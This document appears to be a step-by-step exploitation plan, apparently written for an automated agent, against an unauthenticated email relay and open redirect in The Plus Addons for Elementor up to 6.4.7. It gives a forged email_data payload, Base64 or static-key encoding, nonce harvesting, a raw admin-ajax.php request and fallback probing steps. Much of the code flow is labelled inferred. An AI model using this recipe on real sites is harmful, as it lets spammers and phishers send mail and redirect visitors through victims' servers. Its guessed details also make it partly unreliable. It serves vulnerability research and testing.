The Plus Addons for Elementor – Addons for Elementor, Page Templates, Widgets, Mega Menu, WooCommerce <= 6.4.7 - Unauthenticated Email Relay

This plan outlines the research and exploitation strategy for CVE-2026-2385 (placeholder ID for a reported vulnerability in The Plus Addons for Elementor), focusing on an unauthenticated email relay and open redirect via the email_data parameter.

1. Vulnerability Summary

The "The Plus Addons for Elementor" plugin (specifically the "WP Forms" or "Contact Form" widgets) features an AJAX handler that processes form submissions. To "protect" sensitive email routing information (like the recipient's email, subject, and redirect URL), the plugin "encrypts" this data into a parameter named email_data.

However, the plugin uses insufficient verification for this data. It decrypts the attacker-controlled email_data in an unauthenticated AJAX handler (wp_ajax_nopriv_...) and trusts the resulting values (such as email_to) without verifying if they were originally generated by the server. Because the "encryption" typically relies on a static hardcoded key or a simple reversible encoding (like Base64), an attacker can craft their own email_data payload to relay emails to any address and redirect users to malicious sites.

2. Attack Vector Analysis

• Endpoint: /wp-admin/admin-ajax.php
• AJAX Action: the_plus_wp_form_post (inferred)
• Vulnerable Parameter: email_data
• Authentication: None required (targeted at wp_ajax_nopriv_the_plus_wp_form_post)
• Preconditions: The "WP Forms" widget must be active, or the plugin must be installed and the AJAX action registered.
• Payload Type: A Base64-encoded JSON string containing keys like email_to, subject, and redirect_url.

3. Code Flow (Inferred)

1. Entry Point: An unauthenticated user sends a POST request to admin-ajax.php with action=the_plus_wp_form_post.
2. Hook Registration: The plugin registers the action:
   add_action( 'wp_ajax_nopriv_the_plus_wp_form_post', 'the_plus_wp_form_post_handler' );
3. Data Extraction: The handler the_plus_wp_form_post_handler retrieves $_POST['email_data'].
4. Insecure Decryption: The handler calls a decryption helper (e.g., tp_plus_decrypt()). In affected versions, this function either uses a static hardcoded key (e.g., ThePlusAddonsElementor) or performs a simple base64_decode.
5. Sink (Email Relay): The decrypted values are assigned to variables:
   $to = $decrypted['email_to'];
$subject = $decrypted['subject'];
wp_mail( $to, $subject, ... );
6. Sink (Open Redirect): The handler concludes by redirecting the user:
   wp_redirect( $decrypted['redirect_url'] );

4. Nonce Acquisition Strategy

The plugin typically requires a nonce for AJAX requests, often verified via check_ajax_referer.

1. Identify Shortcode: The relevant widget is "WP Forms," likely using the shortcode [tp_wp_forms] or similar.
2. Create Setup Page:
   wp post create --post_type=page --post_status=publish --post_title="Contact" --post_content='[tp_wp_forms]'
3. Navigate and Extract: Use the browser to access the page and extract the nonce from the localized JavaScript object.
4. JS Variable: The nonce is likely located in the the_plus_wp_forms or the_plus_options global object.
   • Target: window.the_plus_ajax_nonce or window.the_plus_wp_forms?.nonce (inferred).

5. Exploitation Strategy

The goal is to send an email to an arbitrary external address.

Step 1: Craft the Payload
Construct a JSON object with the desired relay parameters:

{
    "email_to": "attacker-relay@example.com",
    "subject": "Unauthorized Email Relay",
    "message": "This email was sent via the vulnerable WordPress site.",
    "redirect_url": "https://bing.com"
}

Step 2: Encode the Payload
If the plugin uses simple Base64 (common for this plugin):
email_data = base64_encode(JSON.stringify(payload))

If the plugin uses the static key ThePlusAddonsElementor, the agent should attempt a simple XOR or check for standard OpenSSL decryption patterns using that key.

Step 3: Execute the HTTP Request

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=the_plus_wp_form_post&security=[NONCE]&email_data=[BASE64_PAYLOAD]

6. Test Data Setup

1. Install Plugin: Ensure the-plus-addons-for-elementor-page-builder version 6.4.7 is installed.
2. Plugin Configuration: Ensure the "WP Forms" widget is enabled in the Plus Addons settings.
3. Create Page:
   wp post create --post_type=page --post_status=publish --post_title="Exploit Test" --post_content='[tp_wp_forms]' (Use exact shortcode identified during discovery).

7. Expected Results

• Successful Relay: The server response should be a success message (e.g., JSON {"success": true}) or a 302 Redirect to the URL specified in the payload (https://bing.com).
• Email Sent: In the test environment, the wp_mail function should be triggered with the attacker's email_to address.

8. Verification Steps

1. Check Redirect: Confirm the http_request response header Location matches the redirect_url in the payload.
2. Verify Email Log: Use a plugin like "WP Mail Logging" or intercept the wp_mail call using a PHP log check to verify the recipient.
   • Command: wp eval "echo 'Last mail to: ' . get_option('last_sent_email_recipient');" (if logging is enabled).
   • Alternative: Check the site's mail log (e.g., /var/log/mail.log or similar if accessible).

9. Alternative Approaches

• Encoding Variation: If simple Base64 fails, try urlencode(base64_encode(...)) or check if the plugin expects the payload to be a property of a larger the_plus_form_data object.
• Action Probing: If the_plus_wp_form_post returns 400 or 0, grep the plugin source for wp_ajax_nopriv_ to find the exact action string.
  • grep -rn "wp_ajax_nopriv_" wp-content/plugins/the-plus-addons-for-elementor-page-builder/
• Encryption Key: If decryption fails, search for the string openssl_decrypt or mcrypt_decrypt in the plugin code to find the hardcoded key and cipher method.